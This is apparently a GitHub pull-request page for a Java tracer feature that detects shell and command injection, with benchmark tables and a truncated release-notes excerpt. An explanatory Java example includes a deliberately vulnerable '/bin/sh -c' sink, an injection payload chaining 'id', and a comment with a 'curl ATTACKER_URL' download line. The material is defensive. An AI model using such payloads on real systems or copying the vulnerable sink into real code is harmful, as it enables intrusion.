Exploit prevention for Shell Injection / Command Injection #7615

Merged: 25 commits from alejandro.gonzalez/rasp-command-injection into master on Dec 19, 2024
Conversation

@jandro996 (Member) commented Sep 13, 2024

What Does This Do

  • Added support for Command Injection (CMDI) exploit prevention:
    • Reused existing instrumentation of java.lang.ProcessImpl.
  • Added support for Shell Injection (SHI) exploit prevention:
    • Instrumented java.lang.Runtime#exec(String, String[], File) for detection.
    • Leveraged SHI heuristics as a workaround for cases where the command is a single String, given that WAF heuristics for CMDI only support String[].
  • Enhanced RASP metrics mechanism:
    • Introduced a new rule_variant tag to metrics:
      • For CMDI: exec.
      • For SHI: shell.
    • Both variants are categorized under the ruletype as command_injection.

Motivation

Additional Notes

Contributor Checklist

Jira ticket: APPSEC-52330

@jandro996 (Member, Author) commented:
Blocked!
At this moment the WAF shell injection detection rule available has been designed to specifically target functions which are explicitly or implicitly calling a shell such as /bin/sh or otherwise.
We also need support for String[], as the best place to call the WAF is reusing ProcessImplInstrumentation instead of the CallSites.
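Added example, not code from this PR or from dd-trace-java: a stand-alone Java program that makes concrete the two sinks the PR description and the "Blocked!" comment above distinguish. `tokenizeLikeRuntimeExec` reproduces what `java.lang.Runtime.exec(String)` does with a `StringTokenizer` before the call reaches `ProcessImpl` (a whitespace split, no shell), so a `;` in a single-string command is only dangerous when argv[0] is itself a shell invoked with `-c`; that is the case the shell-injection rule targets, while an attacker who controls the whole `String[]` simply picks argv[0]. The `ruleVariant` heuristic and the `SHELLS` list are my own illustrative assumptions for how a call could be tagged `shell` or `exec`; they are not the WAF's rule logic. The `/var/app/uploads` directory and the payload are constructed for the example.

```java
import java.io.File;
import java.util.Arrays;
import java.util.List;
import java.util.StringTokenizer;

public class CommandSinks {

    // Tags named in the PR description for the command_injection rule type.
    static final String VARIANT_EXEC = "exec";
    static final String VARIANT_SHELL = "shell";

    // Assumption for this example: argv[0] basenames treated as shell interpreters.
    static final List<String> SHELLS =
            Arrays.asList("sh", "bash", "dash", "zsh", "ksh", "cmd.exe", "powershell.exe");

    /**
     * What Runtime.exec(String) does to a single command string before it reaches
     * ProcessImpl: split on whitespace with StringTokenizer. No shell is involved,
     * so ';', '|' and '$(...)' stay inside one argv element.
     */
    static String[] tokenizeLikeRuntimeExec(String command) {
        StringTokenizer st = new StringTokenizer(command);
        String[] cmdarray = new String[st.countTokens()];
        for (int i = 0; st.hasMoreTokens(); i++) {
            cmdarray[i] = st.nextToken();
        }
        return cmdarray;
    }

    /**
     * Illustrative tagging of an argv array (assumption, not the WAF rule): "shell" when
     * argv[0] is a shell interpreter handed a command string via -c or /c, else "exec".
     */
    static String ruleVariant(String[] cmdarray) {
        if (cmdarray.length >= 3) {
            String base = new File(cmdarray[0]).getName().toLowerCase();
            String flag = cmdarray[1].toLowerCase();
            if (SHELLS.contains(base) && (flag.equals("-c") || flag.equals("/c"))) {
                return VARIANT_SHELL;
            }
        }
        return VARIANT_EXEC;
    }

    // SHI sink: untrusted input concatenated into a string that /bin/sh -c will parse.
    static String[] vulnerableShell(String filename) {
        return new String[] {"/bin/sh", "-c", "cat /var/app/uploads/" + filename};
    }

    // CMDI sink: the whole command line is untrusted, so the attacker chooses argv[0].
    static String[] vulnerableExec(String commandLine) {
        return tokenizeLikeRuntimeExec(commandLine);
    }

    // Hardened: fixed argv[0], the untrusted value confined to one argument and
    // validated against an allow-list that also rules out a leading '-' or '.'.
    static String[] hardened(String filename) {
        if (!filename.matches("[A-Za-z0-9_][A-Za-z0-9._-]*")) {
            throw new IllegalArgumentException("rejected filename: " + filename);
        }
        return new String[] {"/bin/cat", "/var/app/uploads/" + filename};
    }

    public static void main(String[] args) {
        String payload = "report.txt; id > /tmp/pwned"; // constructed attacker input

        String[] shi = vulnerableShell(payload);
        // shell -> [/bin/sh, -c, cat /var/app/uploads/report.txt; id > /tmp/pwned]
        // The shell parses the ';', so "id" runs as a second command.
        System.out.println(ruleVariant(shi) + " -> " + Arrays.toString(shi));

        String[] cmdi = vulnerableExec("ls " + payload);
        // exec -> [ls, report.txt;, id, >, /tmp/pwned]
        // No shell, so ';' is literal; but since the attacker controls the whole string,
        // "curl ATTACKER_URL -o /tmp/x" would run curl: that is the String[] case.
        System.out.println(ruleVariant(cmdi) + " -> " + Arrays.toString(cmdi));

        try {
            hardened(payload);
        } catch (IllegalArgumentException e) {
            System.out.println("hardened: " + e.getMessage());
        }
        String[] ok = hardened("report.txt");
        // exec -> [/bin/cat, /var/app/uploads/report.txt]; to actually run it:
        // new ProcessBuilder(ok).inheritIO().start().waitFor();
        System.out.println(ruleVariant(ok) + " -> " + Arrays.toString(ok));
    }
}
```

Compile with `javac CommandSinks.java` and run `java CommandSinks`; no process is spawned, the program only prints each argv array and the variant it would be tagged with. The hardened version is what both rule variants are meant to protect: argv[0] is a constant and the untrusted value can never become a separate argument or a shell token.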

@jandro996 force-pushed the alejandro.gonzalez/rasp-command-injection branch from 6e8331e to 8a43c76 on November 28, 2024 10:31
pr-commenter bot commented Nov 28, 2024

Benchmarks

Startup

Parameters

| | Baseline | Candidate |
|---|---|---|
| baseline_or_candidate | baseline | candidate |
| git_branch | master | alejandro.gonzalez/rasp-command-injection |
| git_commit_date | 1734517793 | 1734523719 |
| git_commit_sha | a19f73a | 15ba143 |
| release_version | 1.45.0-SNAPSHOT~a19f73a5ea | 1.45.0-SNAPSHOT~15ba1436c2 |

Matching parameters

| | Baseline | Candidate |
|---|---|---|
| application | insecure-bank | insecure-bank |
| ci_job_date | 1734525980 | 1734525980 |
| ci_job_id | 743638578 | 743638578 |
| ci_pipeline_id | 51433873 | 51433873 |
| cpu_model | Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz | Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz |
| module | Agent | Agent |
| parent | None | None |
| variant | iast | iast |

Summary

Found 0 performance improvements and 0 performance regressions! Performance is the same for 53 metrics, 10 unstable metrics.

Startup time reports for petclinic

Chart: petclinic - global startup overhead (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea); the values are in the tables below.

Baseline results

| Module | Variant | Duration | Δ tracing |
|---|---|---|---|
| Agent | tracing | 1.096 s | - |
| Agent | appsec | 1.228 s | 131.982 ms (12.0%) |
| Agent | iast | 1.225 s | 128.933 ms (11.8%) |
| Agent | profiling | 1.325 s | 229.242 ms (20.9%) |
| Total | tracing | 10.46 s | - |
| Total | appsec | 10.736 s | 276.289 ms (2.6%) |
| Total | iast | 10.974 s | 513.761 ms (4.9%) |
| Total | profiling | 10.899 s | 438.66 ms (4.2%) |

Candidate results

| Module | Variant | Duration | Δ tracing |
|---|---|---|---|
| Agent | tracing | 1.101 s | - |
| Agent | appsec | 1.247 s | 145.28 ms (13.2%) |
| Agent | iast | 1.235 s | 133.272 ms (12.1%) |
| Agent | profiling | 1.33 s | 228.509 ms (20.7%) |
| Total | tracing | 10.436 s | - |
| Total | appsec | 10.757 s | 321.497 ms (3.1%) |
| Total | iast | 11.029 s | 593.551 ms (5.7%) |
| Total | profiling | 10.872 s | 436.362 ms (4.2%) |
petclinic - startup break down per module (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea)

| Variant | Module | Baseline | Candidate |
|---|---|---|---|
| tracing | BytebuddyAgent | 696.496 ms | 708.467 ms |
| tracing | GlobalTracer | 317.423 ms | 315.36 ms |
| tracing | AppSec | 55.045 ms | 55.26 ms |
| tracing | Remote Config | 670.863 µs | 670.193 µs |
| tracing | Telemetry | 12.79 ms | 7.81 ms |
| appsec | BytebuddyAgent | 714.575 ms | 731.562 ms |
| appsec | GlobalTracer | 314.252 ms | 314.485 ms |
| appsec | AppSec | 167.215 ms | 166.455 ms |
| appsec | Remote Config | 652.937 µs | 648.96 µs |
| appsec | Telemetry | 7.795 ms | 8.253 ms |
| appsec | IAST | 19.735 ms | 22.774 ms |
| iast | BytebuddyAgent | 816.587 ms | 828.312 ms |
| iast | GlobalTracer | 307.237 ms | 308.207 ms |
| iast | AppSec | 57.607 ms | 55.385 ms |
| iast | Remote Config | 623.571 µs | 619.071 µs |
| iast | Telemetry | 7.392 ms | 7.406 ms |
| iast | IAST | 21.869 ms | 20.904 ms |
| profiling | BytebuddyAgent | 692.985 ms | 701.774 ms |
| profiling | GlobalTracer | 436.077 ms | 431.314 ms |
| profiling | AppSec | 53.961 ms | 54.427 ms |
| profiling | Remote Config | 670.036 µs | 651.029 µs |
| profiling | Telemetry | 7.785 ms | 7.779 ms |
| profiling | ProfilingAgent | 94.634 ms | 94.559 ms |
| profiling | Profiling | 94.658 ms | 94.584 ms |
Startup time reports for insecure-bank

Chart: insecure-bank - global startup overhead (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea); the values are in the tables below.

Baseline results

| Module | Variant | Duration | Δ tracing |
|---|---|---|---|
| Agent | tracing | 1.098 s | - |
| Agent | iast | 1.224 s | 125.63 ms (11.4%) |
| Agent | iast_HARDCODED_SECRET_DISABLED | 1.238 s | 139.738 ms (12.7%) |
| Agent | iast_TELEMETRY_OFF | 1.22 s | 121.45 ms (11.1%) |
| Total | tracing | 8.677 s | - |
| Total | iast | 9.197 s | 520.106 ms (6.0%) |
| Total | iast_HARDCODED_SECRET_DISABLED | 9.179 s | 501.496 ms (5.8%) |
| Total | iast_TELEMETRY_OFF | 9.199 s | 521.44 ms (6.0%) |

Candidate results

| Module | Variant | Duration | Δ tracing |
|---|---|---|---|
| Agent | tracing | 1.102 s | - |
| Agent | iast | 1.24 s | 138.311 ms (12.6%) |
| Agent | iast_HARDCODED_SECRET_DISABLED | 1.24 s | 138.313 ms (12.6%) |
| Agent | iast_TELEMETRY_OFF | 1.234 s | 131.726 ms (12.0%) |
| Total | tracing | 8.632 s | - |
| Total | iast | 9.306 s | 674.098 ms (7.8%) |
| Total | iast_HARDCODED_SECRET_DISABLED | 9.242 s | 610.656 ms (7.1%) |
| Total | iast_TELEMETRY_OFF | 9.254 s | 621.911 ms (7.2%) |
insecure-bank - startup break down per module (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea)

| Variant | Module | Baseline | Candidate |
|---|---|---|---|
| tracing | BytebuddyAgent | 698.76 ms | 709.363 ms |
| tracing | GlobalTracer | 319.208 ms | 315.244 ms |
| tracing | AppSec | 55.19 ms | 55.004 ms |
| tracing | Remote Config | 673.215 µs | 679.014 µs |
| tracing | Telemetry | 10.822 ms | 7.814 ms |
| iast | BytebuddyAgent | 816.015 ms | 831.647 ms |
| iast | GlobalTracer | 306.937 ms | 307.953 ms |
| iast | AppSec | 57.223 ms | 57.569 ms |
| iast | IAST | 22.003 ms | 21.057 ms |
| iast | Remote Config | 630.623 µs | 620.933 µs |
| iast | Telemetry | 7.513 ms | 7.456 ms |
| iast_HARDCODED_SECRET_DISABLED | BytebuddyAgent | 826.37 ms | 831.013 ms |
| iast_HARDCODED_SECRET_DISABLED | GlobalTracer | 309.862 ms | 309.999 ms |
| iast_HARDCODED_SECRET_DISABLED | AppSec | 57.775 ms | 56.044 ms |
| iast_HARDCODED_SECRET_DISABLED | IAST | 22.13 ms | 21.167 ms |
| iast_HARDCODED_SECRET_DISABLED | Remote Config | 624.849 µs | 643.06 µs |
| iast_HARDCODED_SECRET_DISABLED | Telemetry | 7.486 ms | 7.473 ms |
| iast_TELEMETRY_OFF | BytebuddyAgent | 812.347 ms | 826.924 ms |
| iast_TELEMETRY_OFF | GlobalTracer | 306.409 ms | 306.342 ms |
| iast_TELEMETRY_OFF | AppSec | 57.738 ms | 56.911 ms |
| iast_TELEMETRY_OFF | IAST | 21.672 ms | 21.556 ms |
| iast_TELEMETRY_OFF | Remote Config | 616.424 µs | 620.71 µs |
| iast_TELEMETRY_OFF | Telemetry | 7.364 ms | 7.392 ms |

Load

Parameters

| | Baseline | Candidate |
|---|---|---|
| baseline_or_candidate | baseline | candidate |
| end_time | 2024-12-18T12:16:23 | 2024-12-18T12:23:23 |
| git_branch | master | alejandro.gonzalez/rasp-command-injection |
| git_commit_date | 1734517793 | 1734523719 |
| git_commit_sha | a19f73a | 15ba143 |
| release_version | 1.45.0-SNAPSHOT~a19f73a5ea | 1.45.0-SNAPSHOT~15ba1436c2 |
| start_time | 2024-12-18T12:16:09 | 2024-12-18T12:23:09 |

Matching parameters

| | Baseline | Candidate |
|---|---|---|
| application | insecure-bank | insecure-bank |
| ci_job_date | 1734524955 | 1734524955 |
| ci_job_id | 743638579 | 743638579 |
| ci_pipeline_id | 51433873 | 51433873 |
| cpu_model | Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz | Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz |
| variant | iast | iast |

Summary

Found 1 performance improvements and 0 performance regressions! Performance is the same for 11 metrics, 16 unstable metrics.

| scenario | Δ mean http_req_duration | Δ mean throughput | candidate mean http_req_duration | candidate mean throughput | baseline mean http_req_duration | baseline mean throughput |
|---|---|---|---|---|---|---|
| scenario:load:petclinic:profiling | better: [-91.162µs; -40.157µs] or [-5.817%; -2.563%] | unstable: [-443.351op/s; +671.271op/s] or [-14.963%; +22.655%] | 1.501ms | 3076.923op/s | 1.567ms | 2962.963op/s |
Request duration reports for insecure-bank

Chart: insecure-bank - request duration [CI 0.99] (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea); the values are in the tables below.

Baseline results

| Variant | Request duration [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 376.733 µs [356.311 µs, 397.155 µs] | - |
| iast | 493.966 µs [472.267 µs, 515.666 µs] | 117.233 µs (31.1%) |
| iast_FULL | 656.743 µs [635.23 µs, 678.256 µs] | 280.01 µs (74.3%) |
| iast_GLOBAL | 527.998 µs [505.333 µs, 550.663 µs] | 151.265 µs (40.2%) |
| iast_HARDCODED_SECRET_DISABLED | 490.584 µs [469.084 µs, 512.084 µs] | 113.85 µs (30.2%) |
| iast_INACTIVE | 451.004 µs [430.026 µs, 471.981 µs] | 74.27 µs (19.7%) |
| iast_TELEMETRY_OFF | 486.848 µs [465.078 µs, 508.619 µs] | 110.115 µs (29.2%) |
| tracing | 448.668 µs [427.586 µs, 469.749 µs] | 71.934 µs (19.1%) |

Candidate results

| Variant | Request duration [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 376.292 µs [356.643 µs, 395.942 µs] | - |
| iast | 496.882 µs [475.329 µs, 518.435 µs] | 120.59 µs (32.0%) |
| iast_FULL | 653.745 µs [632.227 µs, 675.264 µs] | 277.453 µs (73.7%) |
| iast_GLOBAL | 519.084 µs [497.894 µs, 540.274 µs] | 142.791 µs (37.9%) |
| iast_HARDCODED_SECRET_DISABLED | 488.673 µs [467.526 µs, 509.82 µs] | 112.381 µs (29.9%) |
| iast_INACTIVE | 451.08 µs [430.274 µs, 471.886 µs] | 74.788 µs (19.9%) |
| iast_TELEMETRY_OFF | 480.04 µs [458.79 µs, 501.291 µs] | 103.748 µs (27.6%) |
| tracing | 453.533 µs [431.738 µs, 475.328 µs] | 77.24 µs (20.5%) |
Request duration reports for petclinic

Chart: petclinic - request duration [CI 0.99] (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea); the values are in the tables below.

Baseline results

| Variant | Request duration [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 1.365 ms [1.345 ms, 1.384 ms] | - |
| appsec | 1.751 ms [1.728 ms, 1.775 ms] | 386.575 µs (28.3%) |
| appsec_no_iast | 1.757 ms [1.731 ms, 1.782 ms] | 392.124 µs (28.7%) |
| iast | 1.492 ms [1.47 ms, 1.514 ms] | 127.589 µs (9.3%) |
| profiling | 1.567 ms [1.543 ms, 1.591 ms] | 202.459 µs (14.8%) |
| tracing | 1.491 ms [1.467 ms, 1.516 ms] | 126.579 µs (9.3%) |

Candidate results

| Variant | Request duration [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 1.368 ms [1.348 ms, 1.387 ms] | - |
| appsec | 1.746 ms [1.722 ms, 1.769 ms] | 377.989 µs (27.6%) |
| appsec_no_iast | 1.758 ms [1.734 ms, 1.781 ms] | 389.892 µs (28.5%) |
| iast | 1.488 ms [1.465 ms, 1.511 ms] | 119.945 µs (8.8%) |
| profiling | 1.501 ms [1.478 ms, 1.525 ms] | 133.782 µs (9.8%) |
| tracing | 1.469 ms [1.444 ms, 1.495 ms] | 101.591 µs (7.4%) |

Dacapo

Parameters

| | Baseline | Candidate |
|---|---|---|
| baseline_or_candidate | baseline | candidate |
| git_branch | master | alejandro.gonzalez/rasp-command-injection |
| git_commit_date | 1734517793 | 1734523719 |
| git_commit_sha | a19f73a | 15ba143 |
| release_version | 1.45.0-SNAPSHOT~a19f73a5ea | 1.45.0-SNAPSHOT~15ba1436c2 |

Matching parameters

| | Baseline | Candidate |
|---|---|---|
| application | biojava | biojava |
| ci_job_date | 1734525639 | 1734525639 |
| ci_job_id | 743638580 | 743638580 |
| ci_pipeline_id | 51433873 | 51433873 |
| cpu_model | Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz | Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz |
| variant | appsec | appsec |

Summary

Found 0 performance improvements and 0 performance regressions! Performance is the same for 12 metrics, 0 unstable metrics.

Execution time for biojava

Chart: biojava - execution time [CI 0.99] (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea); the values are in the tables below.

Baseline results

| Variant | Execution Time [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 15.004 s [15.004 s, 15.004 s] | - |
| appsec | 14.944 s [14.944 s, 14.944 s] | -60.0 ms (-0.4%) |
| iast | 18.657 s [18.657 s, 18.657 s] | 3.653 s (24.3%) |
| iast_GLOBAL | 18.005 s [18.005 s, 18.005 s] | 3.001 s (20.0%) |
| profiling | 15.215 s [15.215 s, 15.215 s] | 211.0 ms (1.4%) |
| tracing | 15.098 s [15.098 s, 15.098 s] | 94.0 ms (0.6%) |

Candidate results

| Variant | Execution Time [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 15.222 s [15.222 s, 15.222 s] | - |
| appsec | 14.885 s [14.885 s, 14.885 s] | -337.0 ms (-2.2%) |
| iast | 18.779 s [18.779 s, 18.779 s] | 3.557 s (23.4%) |
| iast_GLOBAL | 17.876 s [17.876 s, 17.876 s] | 2.654 s (17.4%) |
| profiling | 15.44 s [15.44 s, 15.44 s] | 218.0 ms (1.4%) |
| tracing | 15.198 s [15.198 s, 15.198 s] | -24.0 ms (-0.2%) |
Execution time for tomcat

Chart: tomcat - execution time [CI 0.99] (candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea); the values are in the tables below.

Baseline results

| Variant | Execution Time [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 1.48 ms [1.469 ms, 1.492 ms] | - |
| appsec | 2.36 ms [2.319 ms, 2.402 ms] | 880.128 µs (59.5%) |
| iast | 2.1 ms [2.047 ms, 2.154 ms] | 620.246 µs (41.9%) |
| iast_GLOBAL | 2.142 ms [2.088 ms, 2.195 ms] | 661.384 µs (44.7%) |
| profiling | 1.979 ms [1.935 ms, 2.023 ms] | 498.55 µs (33.7%) |
| tracing | 1.936 ms [1.895 ms, 1.977 ms] | 455.814 µs (30.8%) |

Candidate results

| Variant | Execution Time [CI 0.99] | Δ no_agent |
|---|---|---|
| no_agent | 1.475 ms [1.463 ms, 1.486 ms] | - |
| appsec | 2.365 ms [2.322 ms, 2.407 ms] | 890.003 µs (60.4%) |
| iast | 2.089 ms [2.036 ms, 2.142 ms] | 614.524 µs (41.7%) |
| iast_GLOBAL | 2.137 ms [2.084 ms, 2.19 ms] | 662.587 µs (44.9%) |
| profiling | 1.99 ms [1.947 ms, 2.034 ms] | 515.937 µs (35.0%) |
| tracing | 1.932 ms [1.891 ms, 1.972 ms] | 456.957 µs (31.0%) |

@jandro996 force-pushed the alejandro.gonzalez/rasp-command-injection branch from 93385e6 to ff456d8 on December 10, 2024 11:45
@jandro996 force-pushed the alejandro.gonzalez/rasp-command-injection branch from 4ed9f80 to 69555f3 on December 10, 2024 15:58
@jandro996 changed the title from "Add SHI exploit prevention support" to "Add CMDI exploit prevention support" on Dec 11, 2024
@jandro996 force-pushed the alejandro.gonzalez/rasp-command-injection branch from 47d90de to 474257e on December 13, 2024 11:19
@jandro996 changed the title from "Add CMDI exploit prevention support" to "Add CMDI/SHI exploit prevention support" on Dec 13, 2024
@jandro996 changed the title from "Add CMDI/SHI exploit prevention support" to "Exploit prevention for Shell Injection / Command Injection" on Dec 13, 2024
@jandro996 added the "comp: asm waf" (Application Security Management (WAF)) label on Dec 13, 2024
@jandro996 force-pushed the alejandro.gonzalez/rasp-command-injection branch from 7c12922 to cf855f7 on December 14, 2024 09:34
@jandro996 marked this pull request as ready for review on December 16, 2024 11:37
@jandro996 requested review from a team as code owners on December 16, 2024 11:37
github-actions bot commented Dec 16, 2024

Hi! 👋 Thanks for your pull request! 🎉

To help us review it, please make sure to:

  • Add at least one type, and one component or instrumentation label to the pull request

If you need help, please check our contributing guidelines.

@@ -0,0 +1,20 @@
package datadog.trace.instrumentation.java.lang;
A Member reviewer commented on this line:

Not for this PR, since this just follows the current convention, but we should probably move RASP/APPSEC/IAST code in instrumentations to *.iast packages, to make sure codeowners apply to our team instead of APM IDM.

@jandro996 jandro996 requested a review from smola December 16, 2024 12:49
@jandro996 jandro996 added this to the 1.45.0 milestone Dec 16, 2024
@jandro996 jandro996 merged commit 1a33732 into master Dec 19, 2024
150 checks passed
@jandro996 jandro996 deleted the alejandro.gonzalez/rasp-command-injection branch December 19, 2024 06:52
svc-squareup-copybara pushed a commit to cashapp/misk that referenced this pull request Jan 9, 2025
| Package | Type | Package file | Manager | Update | Change |
|---|---|---|---|---|---|
| [com.google.api.grpc:proto-google-common-protos](https://github.com/googleapis/sdk-platform-java) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.50.0` -> `2.50.1` |
| [com.google.cloud:google-cloud-core-http](https://github.com/googleapis/sdk-platform-java) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.49.0` -> `2.49.1` |
| [com.google.cloud:google-cloud-core](https://github.com/googleapis/sdk-platform-java) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.49.0` -> `2.49.1` |
| [com.google.api:gax](https://github.com/googleapis/sdk-platform-java) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.59.0` -> `2.59.1` |
| [com.datadoghq:dd-trace-api](https://github.com/datadog/dd-trace-java) | dependencies | misk/gradle/libs.versions.toml | gradle | minor | `1.44.1` -> `1.45.0` |
| [com.datadoghq:dd-trace-ot](https://github.com/datadog/dd-trace-java) | dependencies | misk/gradle/libs.versions.toml | gradle | minor | `1.44.1` -> `1.45.0` |
| [software.amazon.awssdk:sdk-core](https://aws.amazon.com/sdkforjava) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.29.47` -> `2.29.48` |
| [software.amazon.awssdk:dynamodb-enhanced](https://aws.amazon.com/sdkforjava) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.29.47` -> `2.29.48` |
| [software.amazon.awssdk:dynamodb](https://aws.amazon.com/sdkforjava) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.29.47` -> `2.29.48` |
| [software.amazon.awssdk:aws-core](https://aws.amazon.com/sdkforjava) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.29.47` -> `2.29.48` |
| [software.amazon.awssdk:bom](https://aws.amazon.com/sdkforjava) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.29.47` -> `2.29.48` |
| [software.amazon.awssdk:auth](https://aws.amazon.com/sdkforjava) | dependencies | misk/gradle/libs.versions.toml | gradle | patch | `2.29.47` -> `2.29.48` |

---

### Release Notes

<details>
<summary>datadog/dd-trace-java (com.datadoghq:dd-trace-api)</summary>

### [`v1.45.0`](https://github.com/DataDog/dd-trace-java/releases/tag/v1.45.0): 1.45.0

##### Breaking changes

> [!WARNING]
> Support for custom scope manager using OpenTelemetry tracer artifact (`dd-trace-ot`) is dropped.
> Tracing with OpenTracing API and custom scope manager will continue to work on 1.44.x releases.

##### Components

##### Application Security Management (IAST)

- ✨ Add propagation to URI#toURL method ([#8146](DataDog/dd-trace-java#8146) - [@manuel-alvarez-alvarez](https://github.com/manuel-alvarez-alvarez))
- ✨ Increase IAST propagation to StringBuilder setLength ([#8119](DataDog/dd-trace-java#8119) - [@Mariovido](https://github.com/Mariovido))
- ✨ Increase IAST propagation to StringBuffer append ([#8082](DataDog/dd-trace-java#8082) - [@Mariovido](https://github.com/Mariovido))
- ✨ Handle IAST security controls custom validation and sanitization methods ([#7997](DataDog/dd-trace-java#7997) - [@jandro996](https://github.com/jandro996))

##### Application Security Management (WAF)

- ✨ Update user lifecycle tracking to V3 ([#8108](DataDog/dd-trace-java#8108) - [@manuel-alvarez-alvarez](https://github.com/manuel-alvarez-alvarez))
- ✨ Exploit prevention for Shell Injection / Command Injection ([#7615](DataDog/dd-trace-java#7615) - [@jandro996](https://github.com/jandro996))

##### Build & Tooling

- 💡 Support instrumentation of repackaged libraries ([#8153](DataDog/dd-trace-java#8153) - [@mcculls](https://github.com/mcculls))
- ✨ Configure native image build setting for JDK-22 based GraalVM ([#8092](DataDog/dd-trace-java#8092) - [@MattAlp](https://github.com/MattAlp))

##### Database Monitoring

- ✨ Add full APM/DBM mode for Oracle ([#8090](DataDog/dd-trace-java#8090) - [@nenadnoveljic](https://github.com/nenadnoveljic))

##### Dynamic Instrumentation

- 🐛 make local var hoisting disabled by default ([#8158](DataDog/dd-trace-java#8158) - [@jpbempel](https://github.com/jpbempel))
- 🐛 Fix var hoisting issue when no previous store ([#8122](DataDog/dd-trace-java#8122) - [@jpbempel](https://github.com/jpbempel))
- ✨ Only decorate spans without code origin information ([#8105](DataDog/dd-trace-java#8105) - [@evanchooly](https://github.com/evanchooly))
- 🐛 Fix suspend Kotlin methods instrumentation ([#8080](DataDog/dd-trace-java#8080) - [@jpbempel](https://github.com/jpbempel))
- 🐛 Fix class file version detection ([#8057](DataDog/dd-trace-java#8057) - [@jpbempel](https://github.com/jpbempel))

##### GraalVM native-image

- ✨ Configure native image build setting for JDK-22 based GraalVM ([#8092](DataDog/dd-trace-java#8092) - [@MattAlp](https://github.com/MattAlp))

##### ML Observability (LLMObs)

- ✨🧪 Add LLMObs configuration ([#8076](DataDog/dd-trace-java#8076) - [@gary-huang](https://github.com/gary-huang))

##### Metrics

- Bump integrations-core submodule to 7.60.0 ([#8098](DataDog/dd-trace-java#8098) - [@mcculls](https://github.com/mcculls))
- Upgrade to java-dogstatsd-client v4.4.3 ([#8096](DataDog/dd-trace-java#8096) - [@mcculls](https://github.com/mcculls))

##### OpenTracing

- ⚠️🧹 Remove custom scope manager support ([#8164](DataDog/dd-trace-java#8164) - [@PerfectSlayer](https://github.com/PerfectSlayer))

##### Telemetry

- ✨ Retry telemetry requests if CI Visibility is enabled ([#8147](DataDog/dd-trace-java#8147) - [@nikita-tkachenko-datadog](https://github.com/nikita-tkachenko-datadog))
- ✨ Add configurable Dependency service resolution period ([#8079](DataDog/dd-trace-java#8079) - [@jandro996](https://github.com/jandro996))

##### Testing

- 🐛 Remove restriction to not run vertx4 latest tests on java 17 ([#8133](DataDog/dd-trace-java#8133) - [@vandonr](https://github.com/vandonr))

##### Tracer core

- ✨ Defer remote components to avoid OkHttp class-loading side-effects ([#8131](DataDog/dd-trace-java#8131) - [@mcculls](https://github.com/mcculls))
- ✨ Improve Context API null handling and Javadoc ([#8129](DataDog/dd-trace-java#8129) - [@PerfectSlayer](https://github.com/PerfectSlayer))
- 🐛⚡ Avoid performing blocking I/O operation on application thread ([#8120](DataDog/dd-trace-java#8120) - [@mcculls](https://github.com/mcculls))
- 💡 Introduce a shared context component, independent of tracing ([#8117](DataDog/dd-trace-java#8117) - [@mcculls](https://github.com/mcculls))
- ✨ Improves ServiceNameCollector ([#8109](DataDog/dd-trace-java#8109) - [@amarziali](https://github.com/amarziali))
- Upgrade to ASM 9.7.1 (adds new constant for Java 24) ([#8097](DataDog/dd-trace-java#8097) - [@mcculls](https://github.com/mcculls))
- 🐛 Dynamically evaluate service name for message consumers ([#8088](DataDog/dd-trace-java#8088) - [@amarziali](https://github.com/amarziali))

##### Serverless

- 🐛 Add avoid double instrumenting lambda non-streaming handlers. ([#8073](DataDog/dd-trace-java#8073) - [@purple4reina](https://github.com/purple4reina))

##### Instrumentations

##### AWS SDK instrumentation

- 💡 Instrument EMR's relocated AWS SDK ([#8157](DataDog/dd-trace-java#8157) - [@mcculls](https://github.com/mcculls))

##### Eclipse Vert.x instrumentation

- 🐛 Remove restriction to not run vertx4 latest tests on java 17 ([#8133](DataDog/dd-trace-java#8133) - [@vandonr](https://github.com/vandonr))

##### JDBC instrumentation

- ✨ Add full APM/DBM mode for Oracle ([#8090](DataDog/dd-trace-java#8090) - [@nenadnoveljic](https://github.com/nenadnoveljic))

##### Jetty instrumentation

- 🐛 Ensure jetty 12 has servlet.path starting with / ([#8093](DataDog/dd-trace-java#8093) - [@github-actions](https://github.com/github-actions)[bot])

##### JMS instrumentation

- 🧹 Re-use `javax` JMS module for `jakarta` namespace ([#8155](DataDog/dd-trace-java#8155) - [@mcculls](https://github.com/mcculls))
- 🧹 Group `javax.jms` instrumentations under a single module ([#8154](DataDog/dd-trace-java#8154) - [@mcculls](https://github.com/mcculls))

##### Reactor instrumentation

